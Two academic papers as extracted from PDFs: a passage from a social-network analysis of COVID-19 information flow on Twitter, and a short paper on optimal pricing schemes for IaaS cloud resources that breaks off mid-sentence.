the top 100 on out-degree, were predominately non-professionals, 76% (with 95% of them being ordinary people); and a handful of communication professionals, 18%. Information Table 2. Centrality statistics for influential and all other users in both networks. Retweet Mention Influential users All users Influential users All users In-degree N=100 N=438,821 N=100 N=531,019 Mean 2,681 1.47 2,560 1.43 SD 2,689 58.23 2,364 48.13 Median 1,506 0 1,815 0 Min. 705 0 749 0 Max. 11,954 11,954 11,608 11,608 Skewness 132.10 140.25 Kurtosis 21,154.49 24,930.94 Out-degree N=100 N=438,821 N=100 N=531,019 Mean 47 1.47 62 1.43 SD 23 1.78 29 2.09 Median 38 1 52 1 Min. 32 0 39 0 Max. 158 158 187 187 Skewness 12.43 13.22 Kurtosis 491.54 537.58 Betweenness N=100 N=438,821 N=100 N=531,019 Mean 9,433,471 2,894.66 67,239,434 16,452.62 SD 7,976,886 188,252.40 58,763,864 1,230,822 Median 6,886,086 0 40,851,672 0 Min. 2,728,657 0 15,904,090 0 Max. 43,309,213 43,309,213 215,538,020 215,538,020 Skewness 123.89 125.39 Kurtosis 19,750.70 17,758.65 136 COVID-19 Twitter Network brokers, the top 100 on betweenness, were predominately health professionals, 48% (with most being healthcare providers, 60%); and non- professionals being most of the remainder, 27%. Mention network The mention network followed a similar pattern with information sources being almost evenly divided among the four user types: health professionals, 19%; communication professionals, 18%; government officials, 34%; and non-professionals, 29%. Infor- mation disseminators, as in the retweet network, were predominately non-professionals, 69% (with 93% of them being ordinary people); and a handful of communication professionals, 17%. Information brokers were predominately health professionals, 57%, although in this case these health professionals were more likely to be researchers/scientists (61%); and government (16%) and communication professionals (15%) primarily the remainder. Visualization The one-hour subset data for the retweet network visualization consisted of 14,255 ties from 15,907 users. The subset data for the mention network visualization consisted of 16,379 ties from 19,386 users. Figure 4 visually depicts the structures and information flow of retweet network and mention network. The size and color of the nodes were made proportional to the unweighted in-degree centrality score of each user. The ties between users represented the information exchange links between the users. Directions of ties were ignored. Attention was focused on the overall degree distribution and connectivity between high degree users (information sources) and lower degree users to help reveal the overall network structure and information flow. Spatialization was used to draw nodes with more ties to more central positions. In both networks, a hierarchical structure was apparent and information flow was concentrated Figure 3: Scale free in-degree and out-degree distributions on a log-log scale for retweet and mention networks. Note: Users with a degree score >15 are not shown in histograms. 137 CONNECTIONS T a b le 3 . O c c u p a ti o n s o f in fl u e n ti a l u se rs in r e tw e e t a n d m e n ti o n n e tw o rk s. In fo rm a ti o n s o u rc e s (N = 1 0 0 ) In fo rm a ti o n d is se m in a to rs ( N = 1 0 0 ) In fo rm a ti o n b ro k e rs ( N = 1 0 0 ) R et w ee t H ea lth 2 0 C ar e p ro vi d er s 1 6 (8 0 .0 % ) 3 C ar e p ro vi d er s 1 (3 3 .3 % ) 4 8 C ar e p ro vi d er s 2 9 (6 0 .4 % ) p ro fe ss io n al s R es ea rc h er s/ S ci en tis ts 4 (2 0 .0 % ) R es ea rc h er s/ S ci en tis ts 2 (6 6 .7 % ) R es ea rc h er s/ S ci en tis ts 1 9 (3 9 .6 % ) C o m m u n ic at io n 1 6 M ed ia b ro ad ca st er s 3 (1 8 .8 % ) 1 8 M ed ia b ro ad ca st er s 1 3 (7 2 .2 % ) 1 3 M ed ia b ro ad ca st er s 4 (3 0 .8 % ) p ro fe ss io n al s Jo u rn al is ts /R ep o rt er s 1 3 (8 1 .2 % ) Jo u rn al is ts /R ep o rt er s 5 (2 7 .8 % ) Jo u rn al is ts /R ep o rt er s 9 (6 9 .2 % ) G o ve rn m en t 2 8 P o lit ic ia n s/ P o lic y m ak er s 2 3 (8 2 .1 % ) 3 P o lit ic ia n s/ P o lic y m ak er s 1 (3 3 .3 % ) 1 2 P o lit ic ia n s/ P o lic y m ak er s 6 (5 0 .0 % ) o ffi ci al N at io n al a g en ci es 5 (1 7 .9 % ) N at io n al a g en ci es 2 (6 6 .7 % ) N at io n al a g en ci es 6 (5 0 .0 % ) N o n -p ro fe ss io n al s 3 6 P u b lic f ig u re s 2 9 (8 0 .6 % ) 7 6 P u b lic f ig u re s 4 (5 .3 % ) 2 7 P u b lic f ig u re s 6 (2 2 .2 % ) O rd in ar y In d iv id u al s 7 (1 9 .4 % ) O rd in ar y In d iv id u al s 7 2 (9 4 .7 % ) O rd in ar y In d iv id u al s 2 1 (7 7 .8 % ) M en tio n H ea lth 1 9 C ar e p ro vi d er s 1 6 (8 4 .2 % ) 5 C ar e p ro vi d er s 2 (4 0 .0 % ) 5 7 C ar e p ro vi d er s 2 2 (3 8 .6 % ) p ro fe ss io n al s R es ea rc h er s/ S ci en tis ts 3 (1 5 .8 % ) R es ea rc h er s/ S ci en tis ts 3 (6 0 .0 % ) R es ea rc h er s/ S ci en tis ts 3 5 (6 1 .4 % ) C o m m u n ic at io n 1 8 M ed ia b ro ad ca st er s 4 (2 2 .2 % ) 1 7 M ed ia b ro ad ca st er s 1 3 (7 6 .5 % ) 1 5 M ed ia b ro ad ca st er s 6 (4 0 .0 % ) p ro fe ss io n al s Jo u rn al is ts /R ep o rt er s 1 4 (7 7 .8 % ) Jo u rn al is ts /R ep o rt er s 4 (2 3 .5 % ) Jo u rn al is ts /R ep o rt er s 9 (6 0 .0 % ) G o ve rn m en t 3 4 P o lit ic ia n s/ P o lic y m ak er s 2 9 (8 5 .3 % ) 9 P o lit ic ia n s/ P o lic y m ak er s 4 (4 4 .4 % ) 1 6 P o lit ic ia n s/ P o lic y m ak er s 6 (3 7 .5 % ) o ffi ci al N at io n al a g en ci es 5 (1 4 .7 % ) N at io n al a g en ci es 5 (5 5 .6 % ) N at io n al a g en ci es 1 0 (6 2 .5 % ) N o n -p ro fe ss io n al s 2 9 P u b lic f ig u re s 2 5 (8 6 .2 % ) 6 9 P u b lic f ig u re s 5 (7 .2 % ) 1 2 P u b lic f ig u re s 8 (6 6 .7 % ) O rd in ar y in d iv id u al s 4 (1 3 .8 % ) O rd in ar y in d iv id u al s 6 4 (9 2 .8 % ) O rd in ar y in d iv id u al s 4 (3 3 .3 % ) 138 COVID-19 Twitter Network at the center where influential users are located. A significant portion of users in both networks were connected to only a few others, whereas a few users had a huge proportion of connections. Both networks exhibited a large core cluster, comprised of a small number of high degree users – represented by bigger and brighter nodes in the figure – surrounded by a large number of less influential users and small clusters. In both networks, information brokers played a central role in information diffusion; connections between more influential users and less influential users were mediated by others or clusters. In the retweet network, dense interconnections among influential users, connecting each of their clusters with another, were observed. Implications Despite Twitter’s reputation as an effective medium to connect people and facilitate public communication, the topic of COVID-19 did not bring its users together. Both the retweet and mention networks were sparsely connected, exhibiting a large number of small distinct clusters. A study from Kaur and Singh (2016) reported that disconnected networks often result from distrust in information sources. Consistent with their finding, more than half of the COVID-19 information was generated by non-professional users, increasing the likelihood of encountering false information and thereby potentially spreading misinformation. Moreover, dominant involvement of non- professional users was observed in the information dissemination process. In both the retweet and mention networks, communication professionals were only marginally involved and there were almost no health professionals among the disseminators. Since publicly shared information has a direct impact on the development of public behaviors, it is very important to consider the type of people who act as information disseminators during medical crises (Hilton and Hunt, 2011; Staniland and Smith, 2013). Findings by Keshvari et al. (2018) warned about biased and misleading content that ordinary people, who are not trained to objectively perceive risks and benefits, disseminate with personal speculations and interpretations during epidemics. Communication professionals, on the other hand, are trained to investigate all possible aspects and implications of information before promoting the information. In this process, communication professionals are often dependent on health professionals to substantiate facts and provide balance by ensuring pluralistic aspects and implications of the pandemic (Ahlmén- Laiho et al., 2014). Increasing willingness on the part of communication professionals to disseminate accurate information and to cooperate with health professionals, may be critical to control the spread of dis/misinformation and prevent public confusion. In both the retweet and mention networks, information flow was highly concentrated within a core cluster, comprised of a few influential users and their own clusters; information flow to the rest of the network (the other clusters) was severely restricted due to the limited connectivity. This suggests that the networks facilitate the diffusion of COVID-19 information if brokers integrate with their communities and clusters. In the context of social media communications, the limited connectivity between clusters means that networks would break into isolated components, separated by redundant and unnecessary information and that information will, more often than not, be trapped within its own cluster. Brokers, on the other hand, create paths for information diffusion and make global information Table 4. P-values from Fisher’s exact test comparing occupations across user roles and between networks. Retweet Mention Retweet vs. mention 1 2 3 1 2 3 1 2 3 1. Information sources <0.001 <0.001 <0.001 <0.001 0.6909 2. Information disseminators <0.001 <0.001 0.2707 3. Information brokers 0.0630 139 CONNECTIONS flow easier to attain, if and when they are activated (González-Bailón and Wang, 2016). In a pandemic, a balanced approach to centralized control and management of information is critical in helping public audiences understand the threat and what actions should be taken (Homeland Security Council (US), 2006; Department of Homeland Security, 2018). A proper course of action as information brokers must be taken by government officials to be complete, valid and reliable (Homeland Security Council (US), 2006; Department of Homeland Security, 2018). Un- fortunately, however, that was not happening in the current Twitter’s COVID-19 communication network. Neither the retweet network nor the mention network showed enough influence of government officials as information brokers; in both networks, information flow was primarily maintained by health professionals. Developing social media communication guidelines for officials and national agencies that offer a starting point to foster connections and training to control or promote information flow may help ensure effective information flow and make necessary information timely and accessible to those who need it in the process of emergency response. Both the retweet and mention networks exhibited a scale-free hierarchical structure, with unidirectional information flow. Due to preferential attachment a small number of influential users get, such network structures can be much more effective at rapid information diffusion for timely response and national solidarity during crises (Himelboim et al., 2017; De Brún and McAuliffe, 2018); because a small number of influential users can command a large and disproportionate number of other users and those users then will affect all the other users in their local network, a whole subsystem can be covered in just a few steps, making it relatively easier to keep everyone informed of relevant information such as risks and action items. At the same time, however, such network structures can also be vulnerable to false information and its diffusion can be easily distorted by just one or a few influential users’ absence in the network (Lossio-Ventura and Alatrista-Salas, 2017; De Brún and McAuliffe, 2018); for instance, if one or two Figure 4: Graphs of the #COVID19 retweet and mention networks (April 13, 2020, 5–6 PM, GMT (UTC +0)). 140 COVID-19 Twitter Network influential users were removed or left the network, it would leave a major gap in support for most users thus interrupting information flow; similarly, a single piece of misinformation can be a risk factor for the entire system because of the fast nature of information dissemination. Monitoring information flow and ensuring that the public can rely on a consistently valid source of information via controlled channels at all stages of a pandemic communication planning may help the emergency communication network be more resilient and stable. The visualization results suggested that influential users in the retweet and mention networks may have different reasons to engage in COVID-19 communication. Different interaction patterns and preferences in interaction form in Twitter networks have been previously shown to result in part from differences in the type of messages, which may reflect the reasons users engage in the communication (Conover et al., 2011; Himelboim et al., 2017). Conover et al. (2011) found that, in Twitter’s political discourse where the retweet network was highly polarized while the mention network was not, users tended to retweet other users whom they agreed with politically, while they interacted with users whom they disagreed with more frequently using mentions to argue or share their views. COVID-19’s retweet and mention networks did not exhibit the same connectivity among users. Interacting closely, influential users in the retweet network shared information with each other, and the interactions among influential users facilitated less influential users’ access to information by connecting each of their clusters in the network. In contrast, the absence of interactions among influential users in the mention network led to the more limited information flow across clusters. Studies are needed to investigate whether and how differences in information flow tendencies in health communication represent differences as a function of information type. Limitations This study has some noteworthy limitations. Data collection was restricted to English messages, which may limit generalizability to other languages. The study was unable to access private networks – only publicly available tweets were retrieved for the analyses. Although a majority of Twitter users (87%) reported they keep their accounts public (Wojcik and Hughes, 2019), the findings may not reflect the characteristics and attitudes of private users. Many additional aspects of information diffusion regarding the topic of COVID-19 were not captured by the indicators of information sharing – retweets and mentions. For example, the current study did not include followers-followees structure since it has been reported that influential users are those who have an active audience who mentions or retweets the users, instead of the large number of followers (Cha et al., 2010) and the number of followers/ followees does not fully explain users’ actual activities (Hamzehei et al., 2017); however, it may be possible that the structure explains other aspects such as the impact of the information shared. The current version of the Twitter API does not store users who retweet retweeters. A prior study on information spread on the retweet network connection identified that most (91%) of retweets are directly retweeted from the initial message (Liang et al., 2019). However, the unavailability of the full content record may prevent us from further knowing the pattern of information diffusion among intermediate retweeters. There are no comparable analyses to determine cut-off values of network indices to be high or low. Thus, our only basis was our own interpretation of the data. Social networks are often only weakly scale-free even in cases where the power-law distribution is observed (Broido and Clauset, 2019). Future research should investigate the robustness of the scale-free structures and interpretability of power-law distribution. Drawing inferences solely based on a visual inspection requires further statistical confirmation. Conclusion This study examined the COVID-19 communication network on Twitter to provide insights about health information flow among Americans during a pandemic. Structural characteristics of retweet and mention networks were quantified and described with different metrics (size, density, connectivity, modularity). Influential users (information sources, disseminators, brokers) in each network were identified and the nature of the influential users were conceptually assessed. Results showed that in both retweet and mention networks, the topic of COVID-19 created large fragmented Twitter populations into multiple communication channels, each with its own audience and information sources. The study also found the absence of reliable sources, disseminators that can provide timely, accurate information, and proper management of information flow. These results have implications for understanding and predicting information diffusion in urgent public health communication. Overall, the findings emphasized the importance of connecting users to the essential resources and distinguishing credible information among a huge amount of information being shared. As social media becomes a more 141 CONNECTIONS heavily used news source, the effectiveness of crisis management depends more on the type of information shared among its users and the user reachability in the network. Our work opens several new questions about the underlying structures of social media communication network. Future studies may expand this research, exploring how user clusters are formed and examining how relationships between information type and degree of influence differ by cluster or change over time. References Ahlmén-Laiho, U., Suominen, S., Järvi, U. and Tuominen, R. 2014. “Finnish health journalists’ perceptions of collaborating with medical professionals”, International Conference on Well-Being in the Information Society, Springer, Cham, pp. 1–15. Anger, I. and Kittl, C. 2011. “Measuring influence on Twitter”, Proceedings of the 11th International Conference on Knowledge Management and Knowledge Technologies, pp. 1–4. Ansari, A. 2013. “Green’s art: new media aesthetics in pre-and post-election events in Iran”, Proceedings of the 19th International Symposium of Electronic Art edited by K. Cleland, L. Fisher, and R. Harley, ISEA International, the Australian Network for Art & Technology, and the University of Sydney, Sydney. Aramburu, M. J., Berlanga, R. and Lanza, I. 2020. Social media multidimensional analysis for intelligent health surveillance. International Journal of Environmental Research and Public Health 17: 2289. Broido, A. D. and Clauset, A. 2019. Scale-free networks are rare. Nature Communications 10: 1–10. Centers for Disease Control and Prevention. 2014. Crisis and Emergency Risk Communication (CERC) Manual, Centers for Disease Control and Prevention, Atlanta, available at: https://emergency.cdc.gov/cerc/ manual/index.asp. Cha, M., Haddadi, H., Benevenuto, F. and Gummadi, P. K. 2010. Measuring user influence in Twitter: the million follower fallacy. Icwsm, 10: 30. Clauset, A., Newman, M. E. and Moore, C. 2004. Finding community structure in very large networks. Physical Review E 70: 066111, doi: 10.1103/ PhysRevE.70.066111. Conover, M. D., Ratkiewicz, J., Francisco, M., Gonçalves, B., Menczer, F. and Flammini, A. 2011. Political polarization on twitter. Fifth international AAAI Conference on Weblogs and Social Media. Csardi, G. and Nepusz, T. 2006. The igraph software package for complex network research. InterJournal Complex Systems 1695: 1–9. De Brún, A. and McAuliffe, E. 2018. Social network analysis as a methodological approach to explore health systems: a case study exploring support among senior managers/executives in a hospital network. International Journal of Environmental Research and Public Health 15: 511. Department of Homeland Security 2018. Countering False Information on Social Media in Disasters and Emergencies: Social Media Working Group for Emergency Services and Disaster Management. Fortunato, S. and Barthelemy, M. 2007. Resolution limit in community detection. Proceedings of the National Academy of Sciences 104: 36–41, available at: https://doi.org/10.1073/pnas.0605965104. Freeman, L. C. 1977. A set of measures of centrality based on betweenness. Sociometry 40: 35–41, available at: https://doi.org/10.2307/3033543. Freeman, L. C. 1979. Centrality in social networks: conceptual clarification. Social Networks 1: 215–239. Giglou, R. I., d’Haenens, L. and Van Gorp, B. 2020. “Identifying influential users in Twitter networks of the Turkish Diaspora in Belgium, the Netherlands, and Germany”, Handbook of Research on Politics in the Computer Age, IGI Global, pp. 235–263. Girvan, M. and Newman, M. E. 2002. Community structure in social and biological networks. Proceedings of the National Academy of Sciences 99: 7821–7826. Gleason, B. 2013. #Occupy Wall Street: exploring informal learning about a social movement on Twitter. American Behavioral Scientist 57: 966–982. González-Bailón, S. and Wang, N. 2016. Networked discontent: the anatomy of protest campaigns in social media. Social Networks 44: 95–104. Gruzd, A., Wellman, B. and Takhteyev, Y. 2011. Imagining Twitter as an imagined community. American Behavioral Scientist 55: 1294–1318. Hagberg, A., Swart, P. and S Chult, D. 2008. Exploring Network Structure, dynamics, and Function using NetworkX(No. LA-UR-08-05495; LA-UR-08-5495) Los Alamos National Lab. (LANL), Los Alamos, NM. Hamzehei, A., Jiang, S., Koutra, D., Wong, R. and Chen, F. 2017. Topic-based social influence measure- ment for social networks. Australasian Journal of Infor- mation Systems 21: 61. Harris, J. K., Duncan, A., Men, V., Shevick, N., Krauss, M. J. and Cavazos-Rehg, P. A. 2018. Peer Reviewed: Messengers and messages for tweets that Used #thin- spo and #fitspo Hashtags in 2016. Preventing Chronic Disease 15, e01, doi: 10.5888/pcd15.170309. Harris, J. K., Moreland-Russell, S., Choucair, B., Mansour, R., Staub, M. and Simmons, K. 2014. Tweeting for and against public health policy: response to the Chicago Department of Public Health’s electronic cigarette Twitter campaign. Journal of Medical Internet Research 16: e238. Hilton, S. and Hunt, K. 2011. UK newspapers’ representations of the 2009–10 outbreak of swine flu: one health scare not over-hyped by the media?. Journal of Epidemiology and Community Health 65: 941–946. 142 COVID-19 Twitter Network Himelboim, I., Lariscy, R. W., Tinkham, S. F. and Sweetser, K. D. 2012. Social media and online political communication: the role of interpersonal informational trust and openness. Journal of Broadcasting & Electronic Media 56: 92–115. Himelboim, I., Smith, M. A., Rainie, L., Shneiderman, B. and Espina, C. 2017. Classifying Twitter topic- networks using social network analysis. Social Media+ Society 3. Hinds, P. and McGrath, C. 2006. Structures that work: social structure, work structure and coordination ease in geographically distributed teams. Proceedings of the 2006 20th Anniversary Conference on Computer Supported Cooperative Work, pp. 343–352. Homeland Security Council (US) 2006. National Strategy for Pandemic Influenza: Implementation Plan. Executive Office of the President. Hossain, L. and Kuti, M. 2010. Disaster response preparedness coordination through social networks. Disasters 34: 755–786. Kaalia, R. and Rajapakse, J. C. 2019. Refining modules to determine functionally significant clusters in molecular networks. BMC Genomics 20: 901. Kaur, M. and Singh, S. 2016. Analyzing negative ties in social networks: a survey. Egyptian Informatics Journal 17: 21–43. Kearney, M. W. 2019. rtweet: collecting and analyzing Twitter data. Journal of Open Source Software 4: 1829. Kemp, S. 2020. Digital 2020: April Global Statshot, available at: https://datareportal.com/reports/digital- 2020-april-global-statshot (accessed May 24, 2020). Keshvari, M., Yamani, N., Adibi, P. and Shahnazi, H. 2018. Health journalism: health reporting status and challenges. Iranian Journal of Nursing and Midwifery Research 23: 14. Kruikemeier, S. 2014. How political candidates use Twitter and the impact on votes. Computers in Human Behavior 34: 131–139. Liang, H., Fung, I. C. H., Tse, Z. T. H., Yin, J., Chan, C. H., Pechta, L. E. and Fu, K. W. 2019. How did Ebola information spread on twitter: broadcasting or viral spreading?. BMC Public Health 19: 438. Littau, J. and Jahng, M. R. 2016. Interactivity, social presence, and journalistic use of Twitter. # ISOJ Journal 6: 71–90. Lossio-Ventura, J. A. and Alatrista-Salas, H. (Eds), 2017. Information Management and Big Data: Second Annual International Symposium, SIMBig 2015, Cusco, Peru, September 2-4, 2015, and Third Annual International Symposium, SIMBig 2016, Cusco, Peru, September 1-3, 2016, Revised Selected Papers (Vol. 656), Springer. Majmundar, A., Allem, J. P., Cruz, T. B. and Unger, J. B. 2018. The why we retweet scale. PLoS ONE 13: e0206076, available at: https://doi.org/10.1371/journal. pone.0206076. Martin, J. G. III 2012. Visualizing the Invisible: Application of Knowledge Domain Visualization to the Longstanding Problem of Disciplinary and Professional Conceptualization in Emergency and Disaster Manage- ment. Universal-Publishers, Charles Town, MA. Matsa, K. E. and Shearer, E. 2018. News use across social media platforms 2018. Pew Research Center. Moody, J., McFarland, D. and Bender-deMoll, S. 2005. Dynamic network visualization. American Journal of Sociology 110: 1206–1241. Morris, M. R., Counts, S., Roseway, A., Hoff, A. and Schwarz, J. 2012. Tweeting is believing? Understanding microblog credibility perceptions. Proceedings of the ACM 2012 Conference on Computer Supported Cooperative Work, pp. 441–450. Recuero, R., Zago, G. and Soares, F. 2019. Using social network analysis and social capital to identify user roles on polarized political conversations on Twitter. Social Media+ Society 5: 205630511984874. Shin, J., Jian, L., Driscoll, K. and Bar, F. 2017. Political rumoring on Twitter during the 2012 US presidential election: rumor diffusion and correction. New Media & Society 19: 1214–1235. Shin, J., Jian, L., Driscoll, K. and Bar, F. 2018. The diffusion of misinformation on social media: temporal pattern, message, and source. Computers in Human Behavior 83: 278–287. Staniland, K. and Smith, G. 2013. Flu frames. Sociology of Health & Illness 35: 309–324. Takeichi, Y., Sasahara, K., Suzuki, R. and Arita, T. 2015. Concurrent bursty behavior of social sensors in sporting events. PLoS ONE 10: e0144646. Valente, T. W. 1995. Network Models of the Diffusion of Innovations, Hampton Press, Cresskill, NJ. Valente, T. W. 2010. Social Networks and Health: Models, Methods, and Applications, Oxford University Press. Wang, J., Cellary, W., Wang, D., Wang, H., Chen, S. C., Li, T. and Zhang, Y. (Eds), 2015. Web Information Systems Engineering–WISE 2015: 16th International Conference, Miami, FL, USA, November 1–3, 2015, Proceedings (Vol. 9418), Springer. Wojcik, S. and Hughes, A. 2019. Sizing up Twitter users Pew Research Center, Washington, DC. World Health Organization. 2009. Pandemic Influenza Preparedness and Response: A WHO Guidance Document, World Health Organization, Geneva. Yang, J. and Counts, S. 2010. Predicting the speed, scale, and range of information diffusion in Twitter. 4th International AAAI Conference on Weblogs and Social Media (ICWSM), 10: 355–358. Zhou, L., Zhang, D., Yang, C. C. and Wang, Y. 2018. Harnessing social media for health information management. Electronic Commerce Research and Applications 27: 139–151. work_inf7buxacnf4xdbpvz3cjaeqvm ---- 60 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 Optimal Pricing Strategies for Resource Allocation in IaaS Cloud Zhengce Cai a, Xianwei Li*b,c a Department of Information Service, Anhui Business College, Hefei, China, 230000; b School of Information Engineering, Suzhou University, Suzhou, China, 234000; c Global Information and Telecommunication Institute, Waseda University, Tokyo, Japan Email: *lixianwei163@163.com Abstract. In cloud computing environment, pricing is an effective method for resource allocation and it provides efficient incentive for cloud providers to provide cloud services. In this paper, we investigate two pricing schemes for the allocation of cloud resources in a monopoly cloud market subject to constrained capacity of the cloud provider. There are two main pricing schemes, on-demand and reserved pricing mechanisms adopted by leading cloud providers, i.e., Amazon and Gogrid. We analyze how cloud users make their choice decisions to subscribe to cloud resources under different pricing schemes. Keywords: Cloud computing, pricing schemes, resource allocation, revenue, utility 1. Introduction Cloud computing has received a great deal of attention in both research and engineering fields, and the use of cloud services has become more and more wide. Fig .1 illustrates the application of cloud services [1]. The definition of cloud computing is an open topic and it can be defined by several ways, one popular recognized definition proposed by Buyya et al. [2] is: Computers that are dynamically provisioned and presented as one or more unified computing resources based on “a cloud is a type of parallel and distributed system consisting of a collection of interconnected and virtualized service-level agreements established through negotiation between the service provider and the consumers. Cloud services can be categorized into three main types [3][4], Infrastructure as a Service (IaaS), Software as a Service (SaaS) and Platform as a Service (PaaS), among which IaaS and SaaS are more commonly used, therefore, most of the current works focus on study resource allocation in IaaS and SaaS clouds. In IaaS cloud context, such as Amazon EC2, physical resources (memory, disk, and CPU et al) are virtualized into different types of virtual machines (VMs), and the computational resources are leased to cloud users in the form of VM instances, as shown in Fig .2. Table I shows some configurations of VM instances in Amazon EC2. In PaaS cloud context, such as Google App Engine, cloud users can develop and run their applications on a computing platform. In SaaS cloud context, cloud users can access the applications which are delivered over the Internet. Optimal Pricing Strategies for Resource Allocation in IaaS Cloud 61 The rest of the paper is organized as follows. In the second section, we study optimal pricing for revenue maximization by making use of game theory to investigate the relationship between cloud provider and users. We do simulations to verify our analysis in the third section. Conclusions and future works are given in the last section. Figure.1 The uses application of cloud services [1]. Figure.2 An illustration of IaaS cloud 2. Pricing for Revenue Maximiztion We study optimal pricing for revenue maximization in a monopoly cloud market in this section. First, we analyze how to make choice decision given different prices and pricing schemes of VM instances. Then, we will study how to set optimal prices in order to maximize the revenue of cloud providers while meeting cloud users’ satisfactions. 2.1 Cloud Users’ Choice with Different Pricing Schemes As illustrated in Table II and Table III, even for the same type of instance, cloud users have to make a decision about how to choose the suitable pricing schemes. In order to help cloud users make right decisions, we first analyze which pricing scheme cloud users should choose. Suppose that a cloud user wants to buy t hours to process his/her service requests. Take m1.small VM instance of Amazon EC2 as an example, the price that he/she has to pay is $0.048t, and the reservation price per month is $21.9. By setting 0.048t=21.9, we can get t ≈ 456hours. This means that if total time of the usage of the m1.small VM instance are less than 456hours in one month, it is better for this cloud user to adopt on- demand pricing scheme, otherwise, it is better for this cloud user to adopt reservation pricing scheme. If this cloud user choose to buy the similar type of VM instance in Gogrid, for example, X-Small, the 62 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 total money that he/she has to pay is 0.03t under on-demand pricing scheme, and the reservation price is $16.43 per month, by setting 0.03t=16.43, we get t ≈ 548 hours. This means that if total time of the usage of the X-Small VM instance are less than 548hours in one month, it is better for this cloud user to adopt on-demand pricing scheme, otherwise, it is better for this cloud user to adopt reservation pricing scheme. We summarize the above analysis results in Table IV. Fig .3 further illustrates the adoption option under on-demand and reservation pricing schemes. 2.2 Cloud Users’ Decision Choices We next study how how to set optimal prices in order to maximize the revenue of cloud providers while meeting cloud users’ satisfactions. Assume that there is a cloud provider with total capacity C selling cloud resources in the form of VM instances to a potential number of cloud users, and the price of per VM instance is charged with p $/h under on-demand pricing scheme. Each cloud user is denoted by θ, which is uniformly distributed in [0, 1]. Table 1 Configurations of Amazon EC2 VM Instances Table 2 Prices of some Amazon EC2 VM instances Instance Types CPU Storage (GB) Memory (GiB) m1.small 1 160 1.7 m1.large 2 2*420 7.5 m2.xlarge 2 420 17.1 m3.xlarge 1 4 3.75 c3.2xlarge 8 160 15 Instance Types On-demand pricing(Hourly) Reservation pricing(Monthly) m1.small $0.048/h $21.9/m m1.large $0.385/h $89.79/m m2.xlarge $0.27/h $89.06/m m3.xlarge $0.293/h $152.57/m c3.2xlarge $0.462/h $234.33/m Optimal Pricing Strategies for Resource Allocation in IaaS Cloud 63 Table 3 Choice decision for cloud users We model the interactions between cloud providers and users as a stakelberg game [10], which is illustrated in Fig 4. In the first stage, cloud provider makes their price decisions, and in the second stage, cloud users make their selection decision choices. We make use of the backward method and first analyze cloud users’ decision choices. Given the price of that VM instance p, a cloud user that requires xi VM instances will pay pxi, and his/her net benefit can be expressed as θu(xi) – pxi (1) where u(xi) is the utility that this cloud user gets. We model u(xi) by the following utility function which is widely used in the literature [11], u(xi)= xiα (2) where α is an elasticity parameter, which lies in (0,1). Fig. 5 illustrates how users’ utilities vary with different values of α. From this figure we can observe that α reflects the elastic demand of this cloud user, that is, the percentage change of demand to the percent change of price, and cloud user will get more utility if the value of the elastic parameter is higher. It is known that the elasticity of the above utility function is 1/(1-α). For the cloud users, they will choose to subscribe cloud resources if and only if their net benefits are nonnegative, which implies that, θxα – px ≥ 0, (3) from which we can obtain a critical value θ0, and the cloud users whose values are distributed in [0, θ0] will not to subscribe to the cloud resources, and the users whose values are distributed in [θ0, 1] will choose to use the cloud services. The cloud users’ problem can be expressed by ( ) –ax[ ]m u x pxθ (4) s.t. x ≥ 0 Instance Types Hourly Monthly m1.small Usage <456hours Usage 456hours X-Small Usage <548 hours Usage 548 hours Medium Usage <456hours Usage 456hours Large Usage <581hours Usage 581hours X-Large Usage <546hours Usage 546hours 64 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 Figure.3 Illustration the adoption option. Figure.4 Stakelberg game in the monopoly cloud market. 2.3 Cloud Provider’s Pricing Decision We will study how to set optimal prices in order to maximize the revenue of cloud providers while meeting cloud users’ satisfactions in this subsection. Pricing provides an economic incentive for cloud providers and it ensures the success of cloud computing. For the cloud provider, its objective is to maximize its revenues, which is the total pay from cloud users. The cloud provider’s problem can be formulated as follows, 1 max N i i p xπ = = ∑ (5) s.t. 1 N i i x C = ≤∑ ( ) –0i iu x pxθ ≥ xi ≥ 0 The first constraint of problem (5) ensures that the total number of VM instances should not be over the capacity of this cloud provider, and the second constraint is to make sure that cloud users’ net benefit is nonnegative. From the observation of the second constraint of problem (5), we can find that ( )i ipx u xθ= should be satisfied to be optimal. Otherwise, the cloud provider can increase the price of this type of VM instance. Therefore, we can transform the problem (5) into an equivalent problem, Optimal Pricing Strategies for Resource Allocation in IaaS Cloud 65 ( ) 1 max i N i u xθπ = = ∑ (6) s.t. 1 N i i x C = ≤∑ xi ≥ 0 Now we get the cloud provider’s revenue maximization problem, and we will do simulations to verify our analysis in the next section. 3. Simulation Results In this section, we will do simulations to verify our analysis in the previous section. We first analyze users’ decision choices, and then analyze cloud provider’s revenue problem. 3.1 Cloud Users’ Utilities We first analyze how cloud users are sensitive to the prices of cloud resources. Fig.6 illustrates how cloud users’ net benefits vary with different values of θ with x=2, p=0.2 and α=1/2. We can observe from Fig.6 that not all the cloud users can get net benefit, therefore, some cloud users may not choose to subscribe to the cloud resources. The parameter θ reflects cloud users’ willing to pay, which means that users with higher value of θ will be more willing to use cloud services. Fig.7 illustrates how cloud users’ net benefits vary with the price charged by cloud provider with θ and other parameters are set the same as in Fig.6. We can observe that with price increasing, the net benefit of this cloud user will get less net benefit, and this implies that in order to encourage cloud users to use cloud services, cloud providers should set prices of cloud resources properly, otherwise, higher prices will discourage cloud users to pay to use cloud services. 4. Conclusions and Future Works FWe studied resource allocation in a monopoly cloud market. We analyzed the choice decisions of cloud users in the Amazon EC2 and Gogrid clouds, and pointed out the right choice for cloud users when face on-demand and reservation pricing schemes. We not only analyzed how cloud users’ utilities and net benefits vary with different types of cloud users and different number of VM instances, but also analyzed how the revenue of cloud provider varies with different prices and different number of VM instances. Future works will include resource allocation in a duopoly or oligopoly cloud market where there are more than one cloud providers. Figure.5 How cloud users’ utilities vary with different values of α. 66 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 Figure.6 How cloud users’ net benefits vary with different values of θ. Figure.7 How cloud users’ net benefits vary with price of cloud resources p. 4.1 Cloud Provider’s Revenue Problem We next analyze how the cloud provider sets its prices in order to maximize its revenue. From Eqs. (5) and (6) we know that the revenue of cloud provider is affected by cloud users’ choices, and we transform the revenue function into a function associated with cloud users’ utilities. Fig.8 shows that the revenue of the cloud provider varies with different number of VM instances, and the revenue will be higher if the price is set higher with the same number of VM instances. Fig.9 shows that cloud users are more willing to 